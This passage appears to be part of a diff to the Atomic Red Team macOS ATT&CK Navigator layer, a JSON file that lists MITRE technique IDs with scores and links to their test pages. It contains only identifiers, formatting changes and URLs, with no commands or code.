atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View 